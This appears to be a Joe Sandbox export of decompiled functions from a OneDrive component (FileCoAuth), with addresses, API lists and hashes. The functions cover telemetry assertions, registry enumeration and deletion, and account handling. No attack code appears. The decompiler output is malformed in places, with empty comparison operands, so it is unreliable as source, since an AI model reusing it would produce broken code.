    Function 00E990D4, Relevance: 6.1, APIs: 4, Instructions: 89COMMON
    Download Yara Rule
    C-Code - Quality: 44%
    			E00E990D4(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t33;
				intOrPtr* _t35;
				intOrPtr* _t36;
				intOrPtr _t57;
				void* _t72;
				void* _t73;

				_push(0x64);
				E00EA3161(E00EA3C4B, __ebx, __edi, __esi);
				_t72 = __edx;
				E00E991E6(__ecx,  *((intOrPtr*)(_t73 + 0xc)),  *((intOrPtr*)(_t73 + 0x10)),  *((intOrPtr*)(_t73 + 8)));
				_t57 =  *0xeb17dc; // 0x0
				if(_t57 != 0) {
					E00E9A26F(__ebx, _t57);
				}
				_t33 = 0;
				asm("lock cmpxchg [edx], ecx");
				if(0 != 1) {
					_t35 =  *0xeb17d4; // 0x0
					if(_t35 != 0) {
						 *_t35( *((intOrPtr*)(_t73 + 8)),  *((intOrPtr*)(_t73 + 0xc)),  *((intOrPtr*)(_t73 + 0x10)),  *((intOrPtr*)(_t73 + 0x14)));
					}
					_t36 =  *0xeb17d0; // 0x0
					_t80 = _t36;
					if(_t36 != 0) {
						 *_t36();
					}
					E00E94E9D(_t73 - 0x70,  *((intOrPtr*)(_t73 + 0x14)));
					 *(_t73 - 4) = 0;
					E00E94E9D(_t73 - 0x58,  *((intOrPtr*)(_t73 + 0xc)));
					 *(_t73 - 4) = 1;
					E00E94E9D(_t73 - 0x40,  *((intOrPtr*)(_t73 + 8)));
					 *(_t73 - 4) = 2;
					E00E94E9D(_t73 - 0x28, _t72);
					 *(_t73 - 4) = 3;
					__imp__?RecordFailedAssert@QoS@@YAXABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@00I0_N@Z(_t73 - 0x28, _t73 - 0x40, _t73 - 0x58,  *((intOrPtr*)(_t73 + 0x10)), _t73 - 0x70, 1);
					E00E94307(_t73 - 0x28, 1, 0);
					E00E94307(_t73 - 0x40, 1, 0);
					E00E94307(_t73 - 0x58, 1, 0);
					 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
					E00E94307(_t73 - 0x70, 1, 0);
					E00E9A4C3(1, 0, _t72, _t80);
					_t33 =  *0xeb1830; // 0x0
					if(_t33 != 0) {
						_t33 = CloseHandle(_t33);
						 *0xeb1830 = 0;
					}
					DebugBreak();
				}
				return E00EA313E(_t33);
			}









    0x00e990d4
    0x00e990db
    0x00e990e0
    0x00e990ec
    0x00e990f1
    0x00e990f9
    0x00e990fb
    0x00e990fb
    0x00e99108
    0x00e9910c
    0x00e99112
    0x00e99118
    0x00e9911f
    0x00e9912d
    0x00e9912d
    0x00e9912f
    0x00e99134
    0x00e99136
    0x00e99138
    0x00e99138
    0x00e99140
    0x00e9914d
    0x00e99150
    0x00e9915b
    0x00e9915e
    0x00e99167
    0x00e9916b
    0x00e99174
    0x00e99188
    0x00e99196
    0x00e991a0
    0x00e991aa
    0x00e991af
    0x00e991b8
    0x00e991bd
    0x00e991c2
    0x00e991c9
    0x00e991cc
    0x00e991d2
    0x00e991d2
    0x00e991d8
    0x00e991d8
    0x00e991e3

    APIs
    • __EH_prolog3.LIBCMT ref: 00E990DB
      • Part of subcall function 00E991E6: ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\failfast.cpp,0000001B,FailFastTrace,00EA7D10,CC2F8C83,00000001,00000003,?,00000000), ref: 00E9928A
      • Part of subcall function 00E991E6: ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E99290
    • ?RecordFailedAssert@QoS@@YAXABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@00I0_N@Z.TELEMETRY(?,?,?,?,?,00000001,?,00000000,?,?,?,?,?,00000000,00000064,00E98404), ref: 00E99188
    • CloseHandle.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,?,?,00000000, : ,?,?), ref: 00E991CC
    • DebugBreak.KERNEL32(00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,?,?,00000000, : ,?,?), ref: 00E991D8
      • Part of subcall function 00E9A26F: memset.MSVCR120 ref: 00E9A2B0
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$Assert@BreakCloseDebugEventEvent@@FailedH_prolog3HandleNeeded@@Parameter@@@RecordRotateU?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@00W@std@@Writememset
    • String ID:
    • API String ID: 2135731369-0
    • Opcode ID: 785d9e50a4a6a77de1a3426a9ed5390c8804035e3fb85ca8477d9ed3da722510
    • Instruction ID: c2c9d00ba1c931acbe785c6476d0fbe6f4c710cdb9ddf4d2b05cf8a17392c8d0
    • Opcode Fuzzy Hash: 785d9e50a4a6a77de1a3426a9ed5390c8804035e3fb85ca8477d9ed3da722510
    • Instruction Fuzzy Hash: 4E3178B1500259AFCF11EFA6CC85DEE7BB8BF49300F045129F805B71A2DB319A0ACB20
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9F0AC, Relevance: 6.1, APIs: 4, Instructions: 81registryCOMMON
    Download Yara Rule
    C-Code - Quality: 93%
    			E00E9F0AC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				int _t32;
				int _t46;
				void* _t54;
				short* _t56;
				void* _t62;

				_push(0x228);
				_t27 = E00EA3194(E00EA4D05, __ebx, __edi, __esi);
				_t46 =  *(_t62 + 0x14);
				_t54 =  *(_t62 + 8);
				_t56 =  *(_t62 + 0xc);
				 *(_t62 - 0x230) = _t46;
				E00E94ED0(_t27,  *_t46,  *((intOrPtr*)(_t46 + 4)));
				 *((intOrPtr*)(_t46 + 4)) =  *_t46;
				_t31 =  !=  ? 0x100 : 0;
				 *(_t62 - 0x22c) =  *(_t62 - 0x22c) & 0x00000000;
				_t32 = ( !=  ? 0x100 : 0) | 0x00020019;
				if(_t56[0xa] >= 8) {
					_t56 =  *_t56;
				}
				_t59 =  <=  ? RegOpenKeyExW(_t54, _t56, 0, _t32, _t62 - 0x22c) : _t33 & 0x0000ffff | 0x80070000;
				if(( <=  ? RegOpenKeyExW(_t54, _t56, 0, _t32, _t62 - 0x22c) : _t33 & 0x0000ffff | 0x80070000) >= 0) {
					_t46 = 0;
					do {
						 *(_t62 - 0x234) = 0xff;
						_t54 = RegEnumValueW( *(_t62 - 0x22c), _t46, _t62 - 0x210, _t62 - 0x234, 0, 0, 0, 0);
						_t69 = _t54;
						if(_t54 != 0) {
							__eflags = _t54 - 0x103;
							if(_t54 != 0x103) {
								__eflags = _t54;
								_t59 =  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
							} else {
								goto L7;
							}
						} else {
							E00E94E9D(_t62 - 0x228, _t62 - 0x210);
							 *(_t62 - 4) =  *(_t62 - 4) & _t54;
							_push(_t62 - 0x228);
							E00E99472(_t46,  *(_t62 - 0x230), _t54, _t59, _t69);
							 *(_t62 - 4) =  *(_t62 - 4) | 0xffffffff;
							E00E94307(_t62 - 0x228, 1, _t54);
							goto L7;
						}
						L10:
						RegCloseKey( *(_t62 - 0x22c));
						goto L11;
						L7:
						_t46 = _t46 + 1;
					} while (_t54 == 0);
					goto L10;
				}
				L11:
				return E00EA3152(_t46, _t54, _t59);
			}









    0x00e9f0ac
    0x00e9f0b6
    0x00e9f0bb
    0x00e9f0c0
    0x00e9f0c3
    0x00e9f0c6
    0x00e9f0d1
    0x00e9f0dd
    0x00e9f0e5
    0x00e9f0e8
    0x00e9f0ef
    0x00e9f0f8
    0x00e9f0fa
    0x00e9f0fa
    0x00e9f119
    0x00e9f11e
    0x00e9f124
    0x00e9f126
    0x00e9f134
    0x00e9f153
    0x00e9f155
    0x00e9f157
    0x00e9f194
    0x00e9f19a
    0x00e9f1ac
    0x00e9f1ae
    0x00000000
    0x00000000
    0x00000000
    0x00e9f159
    0x00e9f166
    0x00e9f16b
    0x00e9f17a
    0x00e9f17b
    0x00e9f180
    0x00e9f18d
    0x00000000
    0x00e9f18d
    0x00e9f1b1
    0x00e9f1b7
    0x00000000
    0x00e9f19c
    0x00e9f19c
    0x00e9f19d
    0x00000000
    0x00e9f1a1
    0x00e9f1bd
    0x00e9f1c4

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9F0B6
    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000000,00000000), ref: 00E9F108
    • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00E9F14D
    • RegCloseKey.ADVAPI32(00000000), ref: 00E9F1B7
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: CloseEnumH_prolog3_OpenValue
    • String ID:
    • API String ID: 2466630147-0
    • Opcode ID: 6d9e6c5cc398bb20c2fed02d395bd669c96b31260957cd8fe734c53e3f07fcd0
    • Instruction ID: ef0d95a769d3ea0a4ac14e24c2aaf4f3be0d3995e7c5d76bd7cb8e7e139b36c1
    • Opcode Fuzzy Hash: 6d9e6c5cc398bb20c2fed02d395bd669c96b31260957cd8fe734c53e3f07fcd0
    • Instruction Fuzzy Hash: 2231D672902228EBDF21DF60DC89B9AB7B4FF49310F1141A9E915B7191CB709E84CBA0
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9EF91, Relevance: 6.1, APIs: 4, Instructions: 81registryCOMMON
    Download Yara Rule
    C-Code - Quality: 93%
    			E00E9EF91(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				int _t32;
				int _t46;
				void* _t54;
				short* _t56;
				void* _t62;

				_push(0x228);
				_t27 = E00EA3194(E00EA4D05, __ebx, __edi, __esi);
				_t46 =  *(_t62 + 0x14);
				_t54 =  *(_t62 + 8);
				_t56 =  *(_t62 + 0xc);
				 *(_t62 - 0x230) = _t46;
				E00E94ED0(_t27,  *_t46,  *((intOrPtr*)(_t46 + 4)));
				 *((intOrPtr*)(_t46 + 4)) =  *_t46;
				_t31 =  !=  ? 0x100 : 0;
				 *(_t62 - 0x22c) =  *(_t62 - 0x22c) & 0x00000000;
				_t32 = ( !=  ? 0x100 : 0) | 0x00020019;
				if(_t56[0xa] >= 8) {
					_t56 =  *_t56;
				}
				_t59 =  <=  ? RegOpenKeyExW(_t54, _t56, 0, _t32, _t62 - 0x22c) : _t33 & 0x0000ffff | 0x80070000;
				if(( <=  ? RegOpenKeyExW(_t54, _t56, 0, _t32, _t62 - 0x22c) : _t33 & 0x0000ffff | 0x80070000) >= 0) {
					_t46 = 0;
					do {
						 *(_t62 - 0x234) = 0xff;
						_t54 = RegEnumKeyExW( *(_t62 - 0x22c), _t46, _t62 - 0x210, _t62 - 0x234, 0, 0, 0, 0);
						_t69 = _t54;
						if(_t54 != 0) {
							__eflags = _t54 - 0x103;
							if(_t54 != 0x103) {
								__eflags = _t54;
								_t59 =  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
							} else {
								goto L7;
							}
						} else {
							E00E94E9D(_t62 - 0x228, _t62 - 0x210);
							 *(_t62 - 4) =  *(_t62 - 4) & _t54;
							_push(_t62 - 0x228);
							E00E99472(_t46,  *(_t62 - 0x230), _t54, _t59, _t69);
							 *(_t62 - 4) =  *(_t62 - 4) | 0xffffffff;
							E00E94307(_t62 - 0x228, 1, _t54);
							goto L7;
						}
						L10:
						RegCloseKey( *(_t62 - 0x22c));
						goto L11;
						L7:
						_t46 = _t46 + 1;
					} while (_t54 == 0);
					goto L10;
				}
				L11:
				return E00EA3152(_t46, _t54, _t59);
			}









    0x00e9ef91
    0x00e9ef9b
    0x00e9efa0
    0x00e9efa5
    0x00e9efa8
    0x00e9efab
    0x00e9efb6
    0x00e9efc2
    0x00e9efca
    0x00e9efcd
    0x00e9efd4
    0x00e9efdd
    0x00e9efdf
    0x00e9efdf
    0x00e9effe
    0x00e9f003
    0x00e9f009
    0x00e9f00b
    0x00e9f019
    0x00e9f038
    0x00e9f03a
    0x00e9f03c
    0x00e9f079
    0x00e9f07f
    0x00e9f091
    0x00e9f093
    0x00000000
    0x00000000
    0x00000000
    0x00e9f03e
    0x00e9f04b
    0x00e9f050
    0x00e9f05f
    0x00e9f060
    0x00e9f065
    0x00e9f072
    0x00000000
    0x00e9f072
    0x00e9f096
    0x00e9f09c
    0x00000000
    0x00e9f081
    0x00e9f081
    0x00e9f082
    0x00000000
    0x00e9f086
    0x00e9f0a2
    0x00e9f0a9

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9EF9B
    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000000,00000000), ref: 00E9EFED
    • RegEnumKeyExW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00E9F032
    • RegCloseKey.ADVAPI32(00000000), ref: 00E9F09C
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: CloseEnumH_prolog3_Open
    • String ID:
    • API String ID: 3581956906-0
    • Opcode ID: 62b7029f3ffd4048e9717f4d6c361422e784c15a142b04fc7bbf8ea3b856c409
    • Instruction ID: 8bb828f07e9ab3c9f79e519b9037018dbb102f3e435316bdf435602c257e5fa7
    • Opcode Fuzzy Hash: 62b7029f3ffd4048e9717f4d6c361422e784c15a142b04fc7bbf8ea3b856c409
    • Instruction Fuzzy Hash: 0E31D672901228ABDF20DF60CC89BEAB7B4FF49310F1101A9E905B7181DB70AE44CB50
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9EE8E, Relevance: 6.1, APIs: 4, Instructions: 58registryCOMMON
    Download Yara Rule
    C-Code - Quality: 37%
    			E00E9EE8E(void* _a4, short* _a8, void* _a12) {
				short* _t14;
				signed short _t15;
				signed short _t19;
				int _t23;
				signed short _t26;
				short* _t28;

				_t28 = _a8;
				_t22 =  !=  ? 0x100 : 0;
				_t23 = ( !=  ? 0x100 : 0) | 0x0001000b;
				if(_t28[8] != 0) {
					if(_t28[0xa] < 8) {
						_t14 = _t28;
					} else {
						_t14 =  *_t28;
					}
					_t15 = RegOpenKeyExW(_a4, _t14, 0, _t23,  &_a12);
					_t26 = _t15;
					if(_t26 == 0) {
						__imp__RegDeleteTreeW(_a12, _t15);
						_t26 = _t15;
						_t19 = RegCloseKey(_a12);
						_a12 = _a12 & 0x00000000;
						if(_t26 == 0) {
							if(_t28[0xa] >= 8) {
								_t28 =  *_t28;
							}
							__imp__RegDeleteKeyExW(_a4, _t28, _t23, 0);
							_t26 = _t19;
						}
					}
					_t18 =  <=  ? _t26 : _t26 & 0x0000ffff | 0x80070000;
					return  <=  ? _t26 : _t26 & 0x0000ffff | 0x80070000;
				}
				return 0x80070057;
			}









    0x00e9ee9f
    0x00e9eea2
    0x00e9eea5
    0x00e9eeaf
    0x00e9eebc
    0x00e9eec2
    0x00e9eebe
    0x00e9eebe
    0x00e9eebe
    0x00e9eed0
    0x00e9eed6
    0x00e9eeda
    0x00e9eee0
    0x00e9eee9
    0x00e9eeeb
    0x00e9eef1
    0x00e9eef7
    0x00e9eefd
    0x00e9eeff
    0x00e9eeff
    0x00e9ef08
    0x00e9ef0e
    0x00e9ef0e
    0x00e9eef7
    0x00e9ef1a
    0x00000000
    0x00e9ef1d
    0x00000000

    APIs
    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000000,00000000), ref: 00E9EED0
    • RegDeleteTreeW.ADVAPI32(00000000,00000000), ref: 00E9EEE0
    • RegCloseKey.ADVAPI32(00000000), ref: 00E9EEEB
    • RegDeleteKeyExW.ADVAPI32(?,?,00000000,00000000), ref: 00E9EF08
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Delete$CloseOpenTree
    • String ID:
    • API String ID: 1116079002-0
    • Opcode ID: ebee8780ca26b586614ff65055c76e428bb12833f1c34e42bee5a09ef42051e1
    • Instruction ID: 0d4ec3793e8d0cd1cfc55cab61c09f6d32cf004444bc78087931eef0f03709d8
    • Opcode Fuzzy Hash: ebee8780ca26b586614ff65055c76e428bb12833f1c34e42bee5a09ef42051e1
    • Instruction Fuzzy Hash: A411A032200308AFDF21CF15DC48BA77BA9FB89362F15082AFA55A6250C770EC54CBA0
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E9DBE4, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 279COMMON
    Download Yara Rule
    C-Code - Quality: 81%
    			E00E9DBE4(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t126;
				char _t130;
				char _t140;
				char _t143;
				char _t144;
				void* _t157;
				void* _t159;
				void* _t170;
				void* _t181;
				void* _t186;
				signed int _t195;
				intOrPtr* _t200;
				char _t201;
				intOrPtr _t211;
				intOrPtr _t228;
				void* _t240;
				void* _t244;

				_t242 = __esi;
				_t241 = __edi;
				_t240 = __edx;
				_push(0x120);
				E00EA3194(E00EA4A38, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t244 - 0x10c)) = __ecx;
				_t195 =  *(_t244 + 8);
				 *((intOrPtr*)(_t244 - 0xf8)) =  *((intOrPtr*)(_t244 + 0x14));
				 *(_t244 - 0xf4) = _t195;
				 *((intOrPtr*)(_t244 - 0xfc)) = 0;
				 *((intOrPtr*)(_t244 - 0x108)) = 0;
				 *((intOrPtr*)(_t244 - 0x104)) = 0;
				 *((intOrPtr*)(_t244 - 0x100)) = 0;
				 *(_t244 - 4) = 0;
				_t246 =  *((intOrPtr*)(_t195 + 0x14)) - 8;
				if( *((intOrPtr*)(_t195 + 0x14)) < 8) {
					_t126 = _t195;
				} else {
					_t126 =  *_t195;
				}
				E00E94E9D(_t244 - 0x40, _t126);
				 *(_t244 - 4) = 1;
				_t130 = E00E9F0AC(_t195, _t241, _t242, _t246, 0x80000001, _t244 - 0x40, 0, _t244 - 0x108);
				_t243 = _t130;
				 *(_t244 - 4) = 0;
				E00E94307(_t244 - 0x40, 1, 0);
				if(_t130 < 0) {
					L33:
					 *(_t244 - 4) =  *(_t244 - 4) | 0xffffffff;
					E00E94EF3(_t244 - 0x108);
					return E00EA3152(_t195 & 0xffffff00 |  *((intOrPtr*)(_t244 - 0xfc)) > 0x00000000, _t241, _t243);
				} else {
					_t243 =  *((intOrPtr*)(_t244 - 0x108));
					_t241 =  *((intOrPtr*)(_t244 - 0x104));
					while(_t243 != _t241) {
						E00E9A1D7(_t244 - 0x40, _t243);
						 *(_t244 - 4) = 2;
						__eflags =  *((intOrPtr*)(_t195 + 0x14)) - 8;
						if( *((intOrPtr*)(_t195 + 0x14)) >= 8) {
							_t195 =  *_t195;
						}
						E00E94E9D(_t244 - 0xa4, _t195);
						 *(_t244 - 4) = 3;
						_t140 = E00E9F1E6(_t244 - 0xa4, 0x80000001, _t244 - 0xa4, _t244 - 0x40, 0, _t244 - 0x110);
						 *(_t244 - 4) = 2;
						E00E94307(_t244 - 0xa4, 1, 0);
						__eflags = _t140;
						if(_t140 < 0) {
							L30:
							_t195 =  *(_t244 - 0xf4);
							goto L31;
						} else {
							_t143 =  *((intOrPtr*)(_t244 + 0xc));
							__eflags = _t143;
							if(_t143 == 0) {
								L11:
								_t144 = 0;
								__eflags = 0;
								L12:
								_t211 =  *((intOrPtr*)(_t244 - 0x10c));
								__eflags =  *((char*)(_t211 + 0x44));
								if( *((char*)(_t211 + 0x44)) == 0) {
									L15:
									__eflags =  *((intOrPtr*)(_t244 - 0x30));
									if( *((intOrPtr*)(_t244 - 0x30)) != 0) {
										_t198 =  *((intOrPtr*)(_t244 - 0xf8));
										_push(_t244 - 0x40);
										E00E9B7D8( *((intOrPtr*)(_t244 - 0xf8)),  *_t198 + 0x64, _t240, _t241);
										 *((intOrPtr*)(_t244 - 0xfc)) =  *((intOrPtr*)(_t244 - 0xfc)) + 1;
										 *((intOrPtr*)(_t244 - 0x48)) = 0;
										 *((intOrPtr*)(_t244 - 0x44)) = 0;
										 *((char*)(_t244 - 0xed)) = 0;
										 *((intOrPtr*)(_t244 - 0x44)) = 7;
										 *((intOrPtr*)(_t244 - 0x48)) = 0;
										 *((short*)(_t244 - 0x58)) = 0;
										 *(_t244 - 4) = 4;
										E00E9A1D7(_t244 - 0x28, _t244 - 0x40);
										 *(_t244 - 4) = 5;
										__eflags = E00E99650( *_t198, 0,  *((intOrPtr*)( *_t198 + 0x10)), L"Personal", E00E94E74(L"Personal"));
										if(__eflags != 0) {
											E00EA0545(_t244 - 0x12c, _t241, _t243, __eflags);
											 *(_t244 - 4) = 6;
											_t200 =  *((intOrPtr*)(_t244 - 0xf8));
											__eflags = E00E9944F( *_t200 + 0x30, _t244 - 0x40);
											if(__eflags != 0) {
												__eflags =  *((intOrPtr*)(_t244 - 0x14)) - 8;
												_push(0);
												_t179 =  >=  ?  *((void*)(_t244 - 0x28)) : _t244 - 0x28;
												_push( >=  ?  *((void*)(_t244 - 0x28)) : _t244 - 0x28);
												 *((char*)(_t244 - 0xed)) = 1;
												_push(_t244 - 0xec);
												_t181 = E00E9FB8B(_t200, _t241, _t243,  *((intOrPtr*)(_t244 - 0x14)) - 8);
												 *(_t244 - 4) = 7;
												_t234 = _t244 - 0x28;
												__eflags = _t244 - 0x28 - _t181;
												if(_t244 - 0x28 != _t181) {
													E00E94BDD(_t234, _t181, 0, 0xffffffff);
												}
												 *(_t244 - 4) = 6;
												E00E94307(_t244 - 0xec, 1, 0);
												__eflags =  *((intOrPtr*)(_t244 - 0x14)) - 8;
												_push( *0xeb0030);
												_t184 =  >=  ?  *((void*)(_t244 - 0x28)) : _t244 - 0x28;
												_push( >=  ?  *((void*)(_t244 - 0x28)) : _t244 - 0x28);
												_push(_t244 - 0xd4);
												_t186 = E00E9FF3D(_t200, _t244 - 0xec, _t241, _t243,  *((intOrPtr*)(_t244 - 0x14)) - 8);
												 *(_t244 - 4) = 8;
												_t236 = _t244 - 0x28;
												__eflags = _t244 - 0x28 - _t186;
												if(_t244 - 0x28 != _t186) {
													E00E94BDD(_t236, _t186, 0, 0xffffffff);
												}
												 *(_t244 - 4) = 6;
												E00E94307(_t244 - 0xd4, 1, 0);
											}
											_push(_t244 - 0x28);
											_push( *_t200);
											_push(_t244 - 0xbc);
											_t157 = E00EA08C3(_t200, _t244 - 0x12c, _t240, _t241, _t243, __eflags);
											 *(_t244 - 4) = 9;
											E00E990AD(_t244 - 0x58, _t157);
											 *(_t244 - 4) = 6;
											_t159 = E00E94307(_t244 - 0xbc, 1, 0);
											 *(_t244 - 4) = 5;
											E00E99365(_t159, _t244 - 0x12c);
										} else {
											E00E94DF9(_t244 - 0x58, __eflags, L"{018D5C66-4533-4307-9B53-224DE2ED1FE6}", E00E94E74(L"{018D5C66-4533-4307-9B53-224DE2ED1FE6}"));
										}
										E00E9A1D7(_t244 - 0x8c, _t244 - 0x58);
										 *(_t244 - 4) = 0xa;
										__eflags =  *((intOrPtr*)(_t244 - 0x14)) - 8;
										_t164 =  >=  ?  *((void*)(_t244 - 0x28)) : _t244 - 0x28;
										E00E94E9D(_t244 - 0x74,  >=  ?  *((void*)(_t244 - 0x28)) : _t244 - 0x28);
										 *(_t244 - 4) = 0xb;
										_t201 =  *((intOrPtr*)(_t244 - 0xed));
										__eflags = _t201;
										 *((char*)(_t244 - 0x5c)) = 0 | _t201 == 0x00000000;
										 *(_t244 - 4) = 0xc;
										 *((char*)(_t244 - 0x114)) = 0;
										_push( *((intOrPtr*)(_t244 - 0x114)));
										_t170 = E00E9AE39( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t244 - 0xf8)))) + 0x70)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t244 - 0xf8)))) + 0x74)), _t244 - 0x8c);
										_t228 =  *((intOrPtr*)( *((intOrPtr*)(_t244 - 0xf8))));
										__eflags = _t170 -  *((intOrPtr*)(_t228 + 0x74));
										if(_t170 ==  *((intOrPtr*)(_t228 + 0x74))) {
											_push(_t244 - 0x8c);
											__eflags = _t201;
											if(_t201 == 0) {
												_push( *((intOrPtr*)(_t228 + 0x70)));
												__eflags = _t228 + 0x70;
												_push(_t244 - 0x118);
												E00E9B762(_t228 + 0x70, _t228 + 0x70);
											} else {
												E00E9B7AA(_t228 + 0x70, _t240);
											}
										}
										 *(_t244 - 4) = 5;
										E00E94F21(_t244 - 0x8c);
										 *(_t244 - 4) = 4;
										E00E94307(_t244 - 0x28, 1, 0);
										 *(_t244 - 4) = 2;
										E00E94307(_t244 - 0x58, 1, 0);
									}
									goto L30;
								}
								__eflags = _t144;
								if(_t144 != 0) {
									goto L15;
								}
								_t195 =  *(_t244 - 0xf4);
								E00E9EF24(0x80000001, _t195, _t244 - 0x40, 0);
								L31:
								 *(_t244 - 4) = 0;
								E00E94307(_t244 - 0x40, 1, 0);
								_t243 = _t243 + 0x18;
								__eflags = _t243;
								continue;
							}
							__eflags = _t143 -  *((intOrPtr*)(_t244 - 0x110));
							if(_t143 !=  *((intOrPtr*)(_t244 - 0x110))) {
								goto L11;
							}
							_t144 = 1;
							goto L12;
						}
					}
					goto L33;
				}
			}




















    0x00e9dbe4
    0x00e9dbe4
    0x00e9dbe4
    0x00e9dbe4
    0x00e9dbee
    0x00e9dbf3
    0x00e9dbfc
    0x00e9dbff
    0x00e9dc07
    0x00e9dc0d
    0x00e9dc13
    0x00e9dc19
    0x00e9dc1f
    0x00e9dc25
    0x00e9dc28
    0x00e9dc2c
    0x00e9dc32
    0x00e9dc2e
    0x00e9dc2e
    0x00e9dc2e
    0x00e9dc38
    0x00e9dc3d
    0x00e9dc53
    0x00e9dc58
    0x00e9dc5a
    0x00e9dc65
    0x00e9dc6c
    0x00e9dfa1
    0x00e9dfab
    0x00e9dfb5
    0x00e9dfc1
    0x00e9dc72
    0x00e9dc72
    0x00e9dc78
    0x00e9df99
    0x00e9dc87
    0x00e9dc8c
    0x00e9dc90
    0x00e9dc94
    0x00e9dc96
    0x00e9dc96
    0x00e9dc9f
    0x00e9dca4
    0x00e9dcc1
    0x00e9dcc8
    0x00e9dcd6
    0x00e9dcdb
    0x00e9dcdd
    0x00e9df80
    0x00e9df80
    0x00000000
    0x00e9dce3
    0x00e9dce3
    0x00e9dce6
    0x00e9dce8
    0x00e9dcf6
    0x00e9dcf6
    0x00e9dcf6
    0x00e9dcf8
    0x00e9dcf8
    0x00e9dcfe
    0x00e9dd02
    0x00e9dd24
    0x00e9dd24
    0x00e9dd28
    0x00e9dd2e
    0x00e9dd37
    0x00e9dd3d
    0x00e9dd42
    0x00e9dd4a
    0x00e9dd4d
    0x00e9dd50
    0x00e9dd56
    0x00e9dd5d
    0x00e9dd60
    0x00e9dd64
    0x00e9dd6f
    0x00e9dd74
    0x00e9dd97
    0x00e9dd99
    0x00e9ddbc
    0x00e9ddc1
    0x00e9ddc8
    0x00e9ddd9
    0x00e9dddb
    0x00e9dde1
    0x00e9dde8
    0x00e9ddea
    0x00e9ddee
    0x00e9ddf5
    0x00e9ddfc
    0x00e9ddfd
    0x00e9de02
    0x00e9de06
    0x00e9de09
    0x00e9de0b
    0x00e9de12
    0x00e9de12
    0x00e9de17
    0x00e9de25
    0x00e9de2a
    0x00e9de31
    0x00e9de37
    0x00e9de3b
    0x00e9de42
    0x00e9de43
    0x00e9de48
    0x00e9de4c
    0x00e9de4f
    0x00e9de51
    0x00e9de58
    0x00e9de58
    0x00e9de5d
    0x00e9de6b
    0x00e9de6b
    0x00e9de73
    0x00e9de74
    0x00e9de7c
    0x00e9de83
    0x00e9de88
    0x00e9de90
    0x00e9de95
    0x00e9dea3
    0x00e9dea8
    0x00e9deb2
    0x00e9dd9b
    0x00e9ddac
    0x00e9ddac
    0x00e9dec1
    0x00e9dec6
